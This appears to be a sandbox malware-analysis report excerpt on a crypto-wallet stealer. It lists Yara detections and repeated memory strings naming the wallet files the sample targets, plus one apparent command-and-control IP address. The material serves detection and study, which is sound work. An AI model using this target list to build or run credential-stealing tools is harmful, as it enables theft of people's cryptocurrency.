Source: Yara match	File source: 20.2.52ba7a538c.exe.1e32000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e0c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e32000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e0c000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e58000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 52ba7a538c.exe PID: 6324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3176, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: i8Vwc7iOaG.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: i8Vwc7iOaG.exe	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i8Vwc7iOaG.exe	String found in binary or memory: window-state.json
Source: i8Vwc7iOaG.exe	String found in binary or memory: Jaxx Liberty
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i8Vwc7iOaG.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\
Source: i8Vwc7iOaG.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16fons\AppData\Roaming\Binance\.finger-print.fp
Source: i8Vwc7iOaG.exe	String found in binary or memory: %appdata%\Ethereum
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205307367.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 